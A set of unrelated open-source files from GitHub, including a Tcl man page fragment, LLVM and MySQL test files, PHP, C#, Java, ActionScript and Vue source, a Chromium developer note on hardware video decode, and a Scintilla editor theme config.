.PP \fBTcl_GetChannelErrorInterp\fR places either the error message held in the bypass area of the specified interpreter into \fImsgPtr\fR, or NULL; and resets the bypass, that is, after an invocation all following invocations will return NULL, until an intervening invocation of \fBTcl_SetChannelErrorInterp\fR with a non-NULL message. The \fImsgPtr\fR must not be NULL. The reference count of the message is not touched. The reference previously held by the interpreter is now held by the caller of the function and it is its responsibility to release that reference when it is done with the value. .PP Which functions of a channel driver are allowed to use which bypass function is listed below, as is which functions of the public channel API may leave a messages in the bypass areas. .IP \fBTcl_DriverCloseProc\fR May use \fBTcl_SetChannelErrorInterp\fR, and only this function. .IP \fBTcl_DriverInputProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverOutputProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverSeekProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverWideSeekProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverSetOptionProc\fR Has already the ability to pass arbitrary error messages. Must \fInot\fR use any of the new functions. .IP \fBTcl_DriverGetOptionProc\fR Has already the ability to pass arbitrary error messages. Must \fInot\fR use any of the new functions. .IP \fBTcl_DriverWatchProc\fR Must \fInot\fR use any of the new functions. Is internally called and has no ability to return any type of error whatsoever. .IP \fBTcl_DriverBlockModeProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverGetHandleProc\fR Must \fInot\fR use any of the new functions. It is only a low-level function, and not used by Tcl commands. .IP \fBTcl_DriverHandlerProc\fR Must \fInot\fR use any of the new functions. Is internally called and has no ability to return any type of error whatsoever. .PP Given the information above the following public functions of the Tcl C API are affected by these changes; when these functions are called, the channel may now contain a stored arbitrary error message requiring processing by the caller. .DS .ta 1.9i 4i \fBTcl_Flush\fR \fBTcl_GetsObj\fR \fBTcl_Gets\fR \fBTcl_ReadChars\fR \fBTcl_ReadRaw\fR \fBTcl_Read\fR \fBTcl_Seek\fR \fBTcl_StackChannel\fR \fBTcl_Tell\fR \fBTcl_WriteChars\fR \fBTcl_WriteObj\fR \fBTcl_WriteRaw\fR \fBTcl_Write\fR .DE .PP All other API functions are unchanged. In particular, the functions below leave all their error information in the interpreter result. .DS .ta 1.9i 4i \fBTcl_Close\fR \fBTcl_UnstackChannel\fR \fBTcl_UnregisterChannel\fR .DE .SH "SEE ALSO" Tcl_Close(3), Tcl_OpenFileChannel(3), Tcl_SetErrno(3) .SH KEYWORDS channel driver, error messages, channel type
{ "pile_set_name": "Github" }
// RUN: llvm-mc -triple=i686-pc-windows -filetype=obj -o %t %s
// RUN: llvm-objdump -d -r %t | FileCheck %s

.globl _main
_main:
// CHECK: 00 00 00 00
// CHECK-NEXT: 00000002: IMAGE_REL_I386_DIR32 .rdata
movb L_alias1(%eax), %al
// CHECK: 01 00 00 00
// CHECK-NEXT: 00000008: IMAGE_REL_I386_DIR32 .rdata
movb L_alias2(%eax), %al
retl

.section .rdata,"dr"
L_sym1:
.ascii "\001"
L_sym2:
.ascii "\002"

L_alias1 = L_sym1
L_alias2 = L_sym2
{ "pile_set_name": "Github" }
<?php /** * Copyright 2014-2017 Horde LLC (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you * did not receive this file, see http://www.horde.org/licenses/lgpl21. * * @category Horde * @copyright 2014-2017 Horde LLC * @license http://www.horde.org/licenses/lgpl21 LGPL 2.1 * @package Mime */ /** * Provides methods to manipulate/query MIME IDs. * * @author Michael Slusarz <[email protected]> * @category Horde * @copyright 2014-2017 Horde LLC * @license http://www.horde.org/licenses/lgpl21 LGPL 2.1 * @package Mime * @since 2.5.0 */ class Horde_Mime_Id { /* Constants for idArithmetic() method. */ const ID_DOWN = 1; const ID_NEXT = 2; const ID_PREV = 3; const ID_UP = 4; /** * MIME ID. * * @var string */ public $id; /** * Constructor. * * @param string $id MIME ID. */ public function __construct($id) { $this->id = $id; } /** */ public function __toString() { return $this->id; } /** * Performs MIME ID "arithmetic". * * @param string $action One of: * - ID_DOWN: ID of child. Note: ID_DOWN will first traverse to "$id.0" * if given an ID *NOT* of the form "$id.0". If given an ID of * the form "$id.0", ID_DOWN will traverse to "$id.1". This * behavior can be avoided if 'no_rfc822' option is set. * - ID_NEXT: ID of next sibling. * - ID_PREV: ID of previous sibling. * - ID_UP: ID of parent. Note: ID_UP will first traverse to "$id.0" if * given an ID *NOT* of the form "$id.0". If given an ID of the * form "$id.0", ID_UP will traverse to "$id". This behavior can * be avoided if 'no_rfc822' option is set. * @param array $options Additional options: * - count: (integer) How many levels to traverse. * DEFAULT: 1 * - no_rfc822: (boolean) Don't traverse RFC 822 sub-levels. * DEFAULT: false * * @return mixed The resulting ID string, or null if that ID can not * exist. */ public function idArithmetic($action, array $options = array()) { return $this->_idArithmetic($this->id, $action, array_merge(array( 'count' => 1 ), $options)); } /** * @see idArithmetic() */ protected function _idArithmetic($id, $action, $options) { $pos = strrpos($id, '.'); $end = ($pos === false) ? $id : substr($id, $pos + 1); switch ($action) { case self::ID_DOWN: if ($end == '0') { $id = ($pos === false) ? 1 : substr_replace($id, '1', $pos + 1); } else { $id .= empty($options['no_rfc822']) ? '.0' : '.1'; } break; case self::ID_NEXT: ++$end; $id = ($pos === false) ? $end : substr_replace($id, $end, $pos + 1); break; case self::ID_PREV: if (($end == '0') || (empty($options['no_rfc822']) && ($end == '1'))) { $id = null; } elseif ($pos === false) { $id = --$end; } else { $id = substr_replace($id, --$end, $pos + 1); } break; case self::ID_UP: if ($pos === false) { $id = ($end == '0') ? null : '0'; } elseif (!empty($options['no_rfc822']) || ($end == '0')) { $id = substr($id, 0, $pos); } else { $id = substr_replace($id, '0', $pos + 1); } break; } return (!is_null($id) && --$options['count']) ? $this->_idArithmetic($id, $action, $options) : $id; } /** * Determines if a given MIME ID lives underneath a base ID. * * @param string $id The MIME ID to query. * * @return boolean Whether $id lives under the base ID ($this->id). */ public function isChild($id) { $base = (substr($this->id, -2) == '.0') ? substr($this->id, 0, -1) : rtrim($this->id, '.') . '.'; return ((($base == 0) && ($id != 0)) || (strpos(strval($id), strval($base)) === 0)); } }
{ "pile_set_name": "Github" }
# Enabling hardware <video> decode codepaths on linux

Hardware acceleration of video decode on Linux is
[unsupported](https://crbug.com/137247) in Chrome for user-facing builds. During
development (targeting other platforms) it can be useful to be able to trigger
the code-paths used on HW-accelerated platforms (such as CrOS and win7) in a
linux-based development environment. Here's one way to do so, with details
based on a gprecise setup.

*   Install pre-requisites: On Ubuntu Precise, at least, this includes:

    ```shell
    sudo apt-get install libtool libvdpau1 libvdpau-dev
    ```

*   Install and configure [libva](http://cgit.freedesktop.org/libva/)

    ```shell
    DEST=${HOME}/apps/libva
    cd /tmp
    git clone git://anongit.freedesktop.org/libva
    cd libva
    git reset --hard libva-1.2.1
    ./autogen.sh && ./configure --prefix=${DEST}
    make -j32 && make install
    ```

*   Install and configure the
    [VDPAU](http://cgit.freedesktop.org/vaapi/vdpau-driver) VAAPI driver

    ```shell
    DEST=${HOME}/apps/libva
    cd /tmp
    git clone git://anongit.freedesktop.org/vaapi/vdpau-driver
    cd vdpau-driver
    export PKG_CONFIG_PATH=${DEST}/lib/pkgconfig/:$PKG_CONFIG_PATH
    export LIBVA_DRIVERS_PATH=${DEST}/lib/dri
    export LIBVA_X11_DEPS_CFLAGS=-I${DEST}/include
    export LIBVA_X11_DEPS_LIBS=-L${DEST}/lib
    export LIBVA_DEPS_CFLAGS=-I${DEST}/include
    export LIBVA_DEPS_LIBS=-L${DEST}/lib
    make distclean
    unset CC CXX
    ./autogen.sh && ./configure --prefix=${DEST} --enable-debug
    find . -name Makefile |xargs sed -i 'sI/usr/lib/xorg/modules/driversI${DEST}/lib/driIg'
    sed -i -e 's/_(\(VAEncH264VUIBufferType\|VAEncH264SEIBufferType\));//' src/vdpau_dump.c
    make -j32 && rm -f ${DEST}/lib/dri/{nvidia_drv_video.so,s3g_drv_video.so} && make install
    ```

*   Add to args.gn:
    *   `target_os = "chromeos"` to link in `VaapiVideoDecodeAccelerator`
    *   `proprietary_codecs = true` and `ffmpeg_branding = "Chrome"` to allow
        Chrome to play h.264 content, which is the only codec VAVDA knows
        about today.
*   Rebuild chrome
*   Run chrome with `LD_LIBRARY_PATH=${HOME}/apps/libva/lib` in the
    environment, and with the `--no-sandbox` command line flag.
*   If things don't work, a Debug build (to include D\*LOG's) with
    `--vmodule=*content/common/gpu/media/*=10,gpu_video*=1` might be
    enlightening.

** note
NOTE THIS IS AN UNSUPPORTED CONFIGURATION AND LIKELY TO BE BROKEN AT ANY POINT
IN TIME
**

This page is purely here to help developers targeting supported HW `<video>`
decode platforms be more effective. Do not expect help if this setup fails to
work.
{ "pile_set_name": "Github" }
# Author: Horst Hunger
# Created: 2010-07-06

--source include/not_embedded.inc
--source include/have_partition.inc

let $engine_table= MYISAM;
let $engine_part= MYISAM;
let $engine_subpart= MYISAM;

CREATE USER test2@localhost;

--disable_result_log
--disable_query_log
--source suite/parts/inc/part_exch_tabs.inc
--enable_result_log
--enable_query_log

GRANT USAGE ON *.* TO test2@localhost;
GRANT CREATE, DROP, ALTER, UPDATE, INSERT, SELECT ON test.* TO test2@localhost;

--echo connect (test2,localhost,test2,,test,MASTER_MYPORT,MASTER_MYSOCK);
connect (test2,localhost,test2,,test,$MASTER_MYPORT,$MASTER_MYSOCK);
USE test;
SHOW GRANTS FOR CURRENT_USER;

# 9) Exchanges with different owner.
# Privilege for ALTER and SELECT
ALTER TABLE tp EXCHANGE PARTITION p0 WITH TABLE t_10;
--sorted_result
SELECT * FROM t_10;
--sorted_result
SELECT * FROM tp WHERE a BETWEEN 0 AND 10;
# Back to former values.
ALTER TABLE tp EXCHANGE PARTITION p0 WITH TABLE t_10;
--sorted_result
SELECT * FROM t_10;
--sorted_result
SELECT * FROM tp WHERE a BETWEEN 0 AND 10;
ALTER TABLE tsp EXCHANGE PARTITION sp00 WITH TABLE tsp_00;
--sorted_result
SELECT * FROM tsp_00;
--sorted_result
SELECT * FROM tsp WHERE a BETWEEN 0 AND 10;
# Back to former values.
ALTER TABLE tsp EXCHANGE PARTITION sp00 WITH TABLE tsp_00;
--sorted_result
SELECT * FROM tsp_00;
--sorted_result
SELECT * FROM tsp WHERE a BETWEEN 0 AND 10;

--echo disconnect test2;
disconnect test2;
--echo connection default;
connection default;

REVOKE INSERT ON test.* FROM test2@localhost;

--echo connect (test2,localhost,test2,,test,MASTER_MYPORT,MASTER_MYSOCK);
connect (test2,localhost,test2,,test,$MASTER_MYPORT,$MASTER_MYSOCK);
USE test;
SHOW GRANTS FOR CURRENT_USER;
# Privilege for ALTER and SELECT
--error ER_TABLEACCESS_DENIED_ERROR
ALTER TABLE tp EXCHANGE PARTITION p0 WITH TABLE t_10;
--echo disconnect test2;
disconnect test2;
--echo connection default;
connection default;

GRANT INSERT ON test.* TO test2@localhost;
REVOKE CREATE ON test.* FROM test2@localhost;

--echo connect (test2,localhost,test2,,test,MASTER_MYPORT,MASTER_MYSOCK);
connect (test2,localhost,test2,,test,$MASTER_MYPORT,$MASTER_MYSOCK);
USE test;
SHOW GRANTS FOR CURRENT_USER;
--error ER_TABLEACCESS_DENIED_ERROR
ALTER TABLE tsp EXCHANGE PARTITION sp00 WITH TABLE tsp_00;
--echo disconnect test2;
disconnect test2;
--echo connection default;
connection default;

GRANT CREATE ON test.* TO test2@localhost;
REVOKE DROP ON test.* FROM test2@localhost;

--echo connect (test2,localhost,test2,,test,MASTER_MYPORT,MASTER_MYSOCK);
connect (test2,localhost,test2,,test,$MASTER_MYPORT,$MASTER_MYSOCK);
USE test;
SHOW GRANTS FOR CURRENT_USER;
# Privilege for ALTER and SELECT
--error ER_TABLEACCESS_DENIED_ERROR
ALTER TABLE tp EXCHANGE PARTITION p0 WITH TABLE t_10;
--echo disconnect test2;
disconnect test2;
--echo connection default;
connection default;

--source suite/parts/inc/part_exch_drop_tabs.inc
DROP USER test2@localhost;
{ "pile_set_name": "Github" }
// This file isn't generated, but this comment is necessary to exclude it from StyleCop analysis.
// <auto-generated/>

/* Copyright (c) 2012-2017 The ANTLR Project. All rights reserved.
 * Use of this file is governed by the BSD 3-clause license that
 * can be found in the LICENSE.txt file in the project root.
 */
using Antlr4.Runtime.Atn;
using Antlr4.Runtime.Sharpen;

namespace Antlr4.Runtime.Atn
{
    /// <author>Sam Harwell</author>
    internal abstract class AbstractPredicateTransition : Transition
    {
        public AbstractPredicateTransition(ATNState target)
            : base(target)
        {
        }
    }
}
{ "pile_set_name": "Github" }
package org.hamcrest.filter
{
    import org.flexunit.Assert;
    import org.hamcrest.core.not;
    import org.hamcrest.text.containsString;
    import org.hamcrest.text.emptyString;

    public class FilterFunctionTest extends Assert
    {
        private var filterFunction:FilterFunction;

        [Before]
        public function setup():void
        {
            filterFunction = new FilterFunction();
        }

        [Test]
        public function returnsTrueIfNoMatcher():void
        {
            filterFunction.matcher = null;
            assertTrue( filterFunction.filter( "test" ) );
        }

        [Test]
        public function returnsTrueIfValueMatchesMatcher():void
        {
            filterFunction.matcher = not( emptyString() );
            assertTrue( filterFunction.filter( "a non-empty string" ) );
        }

        [Test]
        public function returnsFalseIfValueDoesNotMatchMatcher():void
        {
            filterFunction.matcher = not( containsString("expected") );
            assertFalse( filterFunction.filter( "unexpected" ) );
        }
    }
}
{ "pile_set_name": "Github" }
import Vue from 'vue/dist/vue.esm'
import Vuex from 'vuex'

import componentMixin from '../../component/component'

import VRuntimeTemplate from "v-runtime-template"

const componentDef = {
  mixins: [componentMixin],
  data: function(){
    return {}
  },
  computed: Vuex.mapState({
    asyncPageTemplate: state => state.pageTemplate,
    loading: state => state.pageLoading
  }),
  components: {
    VRuntimeTemplate: VRuntimeTemplate
  }
}

let component = Vue.component('matestack-ui-core-page-content', componentDef)

export default componentDef
{ "pile_set_name": "Github" }
/* * Copyright 2010-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Portions copyright 2006-2009 James Murty. Please see LICENSE.txt * for applicable license terms and NOTICE.txt for applicable notices. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing * permissions and limitations under the License. */ package com.amazonaws.services.s3.internal; import com.amazonaws.internal.SdkInputStream; import com.amazonaws.logging.Log; import com.amazonaws.logging.LogFactory; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStream; /** * A repeatable input stream for files. This input stream can be repeated an * unlimited number of times, without any limitation on when a repeat can occur. */ public class RepeatableFileInputStream extends SdkInputStream { private static final Log log = LogFactory.getLog("RepeatableFIS"); private final File file; private FileInputStream fis = null; private long bytesReadPastMarkPoint = 0; private long markPoint = 0; /** * Creates a repeatable input stream based on a file. * * @param file The file from which this input stream reads data. * @throws FileNotFoundException If the specified file doesn't exist, or * can't be opened. */ public RepeatableFileInputStream(File file) throws FileNotFoundException { if (file == null) { throw new IllegalArgumentException("File cannot be null"); } this.fis = new FileInputStream(file); this.file = file; } /** * Returns the File this stream is reading data from. * * @return the File this stream is reading data from. */ public File getFile() { return file; } /** * Resets the input stream to the last mark point, or the beginning of the * stream if there is no mark point, by creating a new FileInputStream based * on the underlying file. * * @throws IOException when the FileInputStream cannot be re-created. 
*/ @Override public void reset() throws IOException { this.fis.close(); abortIfNeeded(); this.fis = new FileInputStream(file); long skipped = 0; long toSkip = markPoint; while (toSkip > 0) { skipped = this.fis.skip(toSkip); toSkip -= skipped; } if (log.isDebugEnabled()) { log.debug("Reset to mark point " + markPoint + " after returning " + bytesReadPastMarkPoint + " bytes"); } this.bytesReadPastMarkPoint = 0; } @Override public boolean markSupported() { return true; } @Override public void mark(int readlimit) { abortIfNeeded(); this.markPoint += bytesReadPastMarkPoint; this.bytesReadPastMarkPoint = 0; if (log.isDebugEnabled()) { log.debug("Input stream marked at " + this.markPoint + " bytes"); } } @Override public int available() throws IOException { abortIfNeeded(); return fis.available(); } @Override public void close() throws IOException { fis.close(); abortIfNeeded(); } @Override public int read() throws IOException { abortIfNeeded(); int byteRead = fis.read(); if (byteRead != -1) { bytesReadPastMarkPoint++; return byteRead; } else { return -1; } } @Override public long skip(long n) throws IOException { abortIfNeeded(); long skipped = fis.skip(n); bytesReadPastMarkPoint += skipped; return skipped; } @Override public int read(byte[] arg0, int arg1, int arg2) throws IOException { abortIfNeeded(); int count = fis.read(arg0, arg1, arg2); bytesReadPastMarkPoint += count; return count; } @Override public InputStream getWrappedInputStream() { return fis; } }
{ "pile_set_name": "Github" }
[General] FontFamily=Consolas FontSize=12 CaretForegroundColor=11004961 CaretLineBackgroundColor=0 MatchedBraceForegroundColor=15800088 MatchedBraceBackgroundColor=1536 UnmatchedBraceForegroundColor=1536 UnmatchedBraceBackgroundColor=12303291 MarkerForegroundColor=186882 MarkerBackgroundColor=0 FoldMarginFirstColor=8704 FoldMarginSecondColor=8704 IndentationGuidesForegroundColor=30464 IndentationGuidesBackgroundColor=1536 IndicatorForegroundColor=128 IndicatorOutlineColor=240 MarginsForegroundColor=30464 MarginsBackgroundColor=4352 [Scintilla] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;color = text color -> [0..16777215] ;; ;;eolfil = end-of-line fill -> true | false ;; ;;font = family, size, bold, italic, underline ;; ;;font2 = family, size, bold, italic, underline ;; ;;paper = background color -> [0..16777215] ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Default Lua\style0\color=16777215 Lua\style0\eolfill=false Lua\style0\font=Consolas, 12, 0, 0, 0 Lua\style0\font2=Consolas, 12, 0, 0, 0 Lua\style0\paper=4352 ;Comment Lua\style1\color=33300 Lua\style1\eolfill=false Lua\style1\font=Consolas, 12, 0, 0, 0 Lua\style1\font2=Consolas, 10, 1, 0, 0 Lua\style1\paper=4352 ;LineComment Lua\style2\color=33300 Lua\style2\eolfill=true Lua\style2\font=Consolas, 12, 0, 0, 0 Lua\style2\font2=Consolas, 11, 0, 0, 1 Lua\style2\paper=1536 ;Number Lua\style4\color=15067138 Lua\style4\eolfill=false Lua\style4\font=Consolas, 12, 0, 0, 0 Lua\style4\font2=Consolas, 12, 1, 0, 0 Lua\style4\paper=1536 ;Keyword Lua\style5\color=186882 Lua\style5\eolfill=false Lua\style5\font=Consolas, 12, 0, 0, 0 Lua\style5\font2=Consolas, 12, 1, 0, 0 Lua\style5\paper=1536 ;String Lua\style6\color=15067138 Lua\style6\eolfill=false Lua\style6\font=Consolas, 12, 0, 0, 0 Lua\style6\font2=Consolas, 12, 0, 0, 0 Lua\style6\paper=4352 ;Character Lua\style7\color=15067138 Lua\style7\eolfill=false Lua\style7\font=Consolas, 12, 0, 0, 0 Lua\style7\font2=Consolas, 12, 0, 0, 0 Lua\style7\paper=1536 ;LiteralString Lua\style8\color=250371 Lua\style8\eolfill=false Lua\style8\font=Consolas, 12, 0, 0, 0 Lua\style8\font2=Consolas, 11, 1, 0, 0 Lua\style8\paper=0 ;Preprocessor Lua\style9\color=8355584 Lua\style9\eolfill=false Lua\style9\font=Consolas, 12, 0, 0, 0 Lua\style9\font2=Consolas, 12, 0, 0, 0 Lua\style9\paper=1536 ;Operator Lua\style10\color=15527662 Lua\style10\eolfill=false Lua\style10\font=Consolas, 12, 0, 0, 0 Lua\style10\font2=Consolas, 12, 0, 0, 0 Lua\style10\paper=1536 ;Identifier Lua\style11\color=7848704 Lua\style11\eolfill=false Lua\style11\font=Consolas, 12, 0, 0, 0 Lua\style11\font2=Consolas, 12, 0, 0, 0 Lua\style11\paper=1536 ;UnclosedString Lua\style12\color=1536 Lua\style12\eolfill=false Lua\style12\font=Consolas, 12, 0, 0, 1 Lua\style12\font2=Consolas, 12, 0, 0, 1 Lua\style12\paper=7848704 ;BasicFunctions Lua\style13\color=59550 Lua\style13\eolfill=false Lua\style13\font=Consolas, 12, 0, 0, 0 Lua\style13\font2=Consolas, 12, 0, 0, 0 Lua\style13\paper=1536 ;StringTableMathsFunctions Lua\style14\color=59550 Lua\style14\eolfill=false Lua\style14\font=Consolas, 12, 0, 0, 0 Lua\style14\font2=Consolas, 12, 0, 0, 0 Lua\style14\paper=1536 ;CoroutinesIOSystemFacilities Lua\style15\color=16619042 Lua\style15\eolfill=false Lua\style15\font=Consolas, 12, 0, 0, 0 Lua\style15\font2=Consolas, 12, 0, 0, 0 Lua\style15\paper=1536 ;KeywordSet5 Lua\style16\color=0 Lua\style16\eolfill=false Lua\style16\font=Consolas, 12, 0, 0, 0 Lua\style16\font2=Consolas, 12, 0, 0, 0 Lua\style16\paper=1536 ;KeywordSet6 Lua\style17\color=0 
Lua\style17\eolfill=false Lua\style17\font=Consolas, 12, 0, 0, 0 Lua\style17\font2=Consolas, 12, 0, 0, 0 Lua\style17\paper=1536 ;KeywordSet7 Lua\style18\color=0 Lua\style18\eolfill=false Lua\style18\font=Consolas, 12, 0, 0, 0 Lua\style18\font2=Consolas, 12, 0, 0, 0 Lua\style18\paper=1536 ;KeywordSet8 Lua\style19\color=0 Lua\style19\eolfill=false Lua\style19\font=Consolas, 12, 0, 0, 0 Lua\style19\font2=Consolas, 12, 0, 0, 0 Lua\style19\paper=1536 ;Label Lua\style20\color=8355584 Lua\style20\eolfill=false Lua\style20\font=Consolas, 12, 0, 0, 0 Lua\style20\font2=Consolas, 12, 0, 0, 0 Lua\style20\paper=1536 ; Lua\properties\foldcompact=true ; Lua\defaultcolor=16777215 Lua\defaultpaper=1536 Lua\defaultfont=Consolas, 12, 0, 0, 0 Lua\defaultfont2=Consolas, 12, 0, 0, 0 Lua\autoindentstyle=-1 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Default C%2B%2B\style0\color=16777215 C%2B%2B\style0\eolfill=false C%2B%2B\style0\font=Consolas, 12, 0, 0, 0 C%2B%2B\style0\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style0\paper=1536 ;Comment C%2B%2B\style1\color=7630941 C%2B%2B\style1\eolfill=false C%2B%2B\style1\font=Consolas, 12, 0, 0, 0 C%2B%2B\style1\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style1\paper=1536 ;CommentLine C%2B%2B\style2\color=7630941 C%2B%2B\style2\eolfill=false C%2B%2B\style2\font=Consolas, 12, 0, 0, 0 C%2B%2B\style2\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style2\paper=1536 ;CommentDoc C%2B%2B\style3\color=7630941 C%2B%2B\style3\eolfill=false C%2B%2B\style3\font=Consolas, 12, 0, 0, 0 C%2B%2B\style3\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style3\paper=1536 ;Number C%2B%2B\style4\color=11436543 C%2B%2B\style4\eolfill=false C%2B%2B\style4\font=Consolas, 12, 0, 0, 0 C%2B%2B\style4\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style4\paper=1536 ;Keyword C%2B%2B\style5\color=6805743 C%2B%2B\style5\eolfill=false C%2B%2B\style5\font=Consolas, 12, 0, 0, 0 C%2B%2B\style5\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style5\paper=1536 ;DoubleQuotedString C%2B%2B\style6\color=15129460 C%2B%2B\style6\eolfill=false C%2B%2B\style6\font=Consolas, 12, 0, 0, 0 C%2B%2B\style6\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style6\paper=1536 ;SingleQuotedString C%2B%2B\style7\color=15129460 C%2B%2B\style7\eolfill=false C%2B%2B\style7\font=Consolas, 12, 0, 0, 0 C%2B%2B\style7\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style7\paper=1536 ;UUID C%2B%2B\style8\color=15388106 C%2B%2B\style8\eolfill=false C%2B%2B\style8\font=Consolas, 12, 0, 0, 0 C%2B%2B\style8\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style8\paper=1536 ;PreProcessor C%2B%2B\style9\color=8355584 C%2B%2B\style9\eolfill=false C%2B%2B\style9\font=Consolas, 12, 0, 0, 0 C%2B%2B\style9\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style9\paper=1536 ;Operator C%2B%2B\style10\color=15790320 C%2B%2B\style10\eolfill=false C%2B%2B\style10\font=Consolas, 12, 0, 0, 0 C%2B%2B\style10\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style10\paper=1536 ;Identifier C%2B%2B\style11\color=15790320 C%2B%2B\style11\eolfill=false C%2B%2B\style11\font=Consolas, 12, 0, 0, 0 C%2B%2B\style11\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style11\paper=1536 ;UnclosedString C%2B%2B\style12\color=15129460 C%2B%2B\style12\eolfill=true C%2B%2B\style12\font=Consolas, 12, 0, 0, 1 C%2B%2B\style12\font2=Consolas, 12, 0, 0, 1 C%2B%2B\style12\paper=14729440 ;VerbatimString C%2B%2B\style13\color=15129460 C%2B%2B\style13\eolfill=true C%2B%2B\style13\font=Consolas, 12, 0, 0, 0 C%2B%2B\style13\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style13\paper=14745568 ;Regex C%2B%2B\style14\color=15129460 C%2B%2B\style14\eolfill=true C%2B%2B\style14\font=Consolas, 12, 0, 0, 0 C%2B%2B\style14\font2=Consolas, 
12, 0, 0, 0 C%2B%2B\style14\paper=14741728 ;CommentLineDoc C%2B%2B\style15\color=7630941 C%2B%2B\style15\eolfill=false C%2B%2B\style15\font=Consolas, 12, 0, 0, 0 C%2B%2B\style15\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style15\paper=1536 ;KeywordSet2 C%2B%2B\style16\color=16619042 C%2B%2B\style16\eolfill=false C%2B%2B\style16\font=Consolas, 12, 0, 0, 0 C%2B%2B\style16\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style16\paper=1536 ;CommentDocKeyword C%2B%2B\style17\color=7630941 C%2B%2B\style17\eolfill=false C%2B%2B\style17\font=Consolas, 12, 0, 0, 0 C%2B%2B\style17\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style17\paper=1536 ;CommentDocKeywordError C%2B%2B\style18\color=7630941 C%2B%2B\style18\eolfill=false C%2B%2B\style18\font=Consolas, 12, 0, 0, 0 C%2B%2B\style18\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style18\paper=1536 ;GlobalClass C%2B%2B\style19\color=16777215 C%2B%2B\style19\eolfill=false C%2B%2B\style19\font=Consolas, 12, 0, 0, 0 C%2B%2B\style19\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style19\paper=1536 ;RawString C%2B%2B\style20\color=15129460 C%2B%2B\style20\eolfill=false C%2B%2B\style20\font=Consolas, 12, 0, 0, 0 C%2B%2B\style20\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style20\paper=16774143 ;TripleQuotedVerbatimString C%2B%2B\style21\color=15129460 C%2B%2B\style21\eolfill=true C%2B%2B\style21\font=Consolas, 12, 0, 0, 0 C%2B%2B\style21\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style21\paper=14745568 ;HashQuotedString C%2B%2B\style22\color=15129460 C%2B%2B\style22\eolfill=true C%2B%2B\style22\font=Consolas, 12, 0, 0, 0 C%2B%2B\style22\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style22\paper=15204311 ;PreProcessorComment C%2B%2B\style23\color=7630941 C%2B%2B\style23\eolfill=false C%2B%2B\style23\font=Consolas, 12, 0, 0, 0 C%2B%2B\style23\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style23\paper=1536 ;PreProcessorCommentLineDoc C%2B%2B\style24\color=7630941 C%2B%2B\style24\eolfill=false C%2B%2B\style24\font=Consolas, 12, 0, 0, 0 C%2B%2B\style24\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style24\paper=1536 ; C%2B%2B\style40\color=11571376 C%2B%2B\style40\eolfill=false C%2B%2B\style40\font=Consolas, 12, 0, 0, 0 C%2B%2B\style40\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style40\paper=16774143 ; C%2B%2B\style42\color=9482384 C%2B%2B\style42\eolfill=true C%2B%2B\style42\font=Consolas, 12, 0, 0, 0 C%2B%2B\style42\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style42\paper=14745568 ; C%2B%2B\style44\color=9482384 C%2B%2B\style44\eolfill=true C%2B%2B\style44\font=Consolas, 12, 0, 0, 0 C%2B%2B\style44\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style44\paper=15204311 ; C%2B%2B\style46\color=10535056 C%2B%2B\style46\eolfill=false C%2B%2B\style46\font=Consolas, 12, 0, 0, 0 C%2B%2B\style46\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style46\paper=1536 ;InactiveDefault C%2B%2B\style64\color=12632256 C%2B%2B\style64\eolfill=false C%2B%2B\style64\font=Consolas, 12, 0, 0, 0 C%2B%2B\style64\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style64\paper=1536 ; C%2B%2B\style65\color=9482384 C%2B%2B\style65\eolfill=false C%2B%2B\style65\font=Consolas, 12, 0, 0, 0 C%2B%2B\style65\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style65\paper=1536 ; C%2B%2B\style66\color=9482384 C%2B%2B\style66\eolfill=false C%2B%2B\style66\font=Consolas, 12, 0, 0, 0 C%2B%2B\style66\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style66\paper=1536 ; C%2B%2B\style67\color=13684944 C%2B%2B\style67\eolfill=false C%2B%2B\style67\font=Consolas, 12, 0, 0, 0 C%2B%2B\style67\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style67\paper=1536 ; 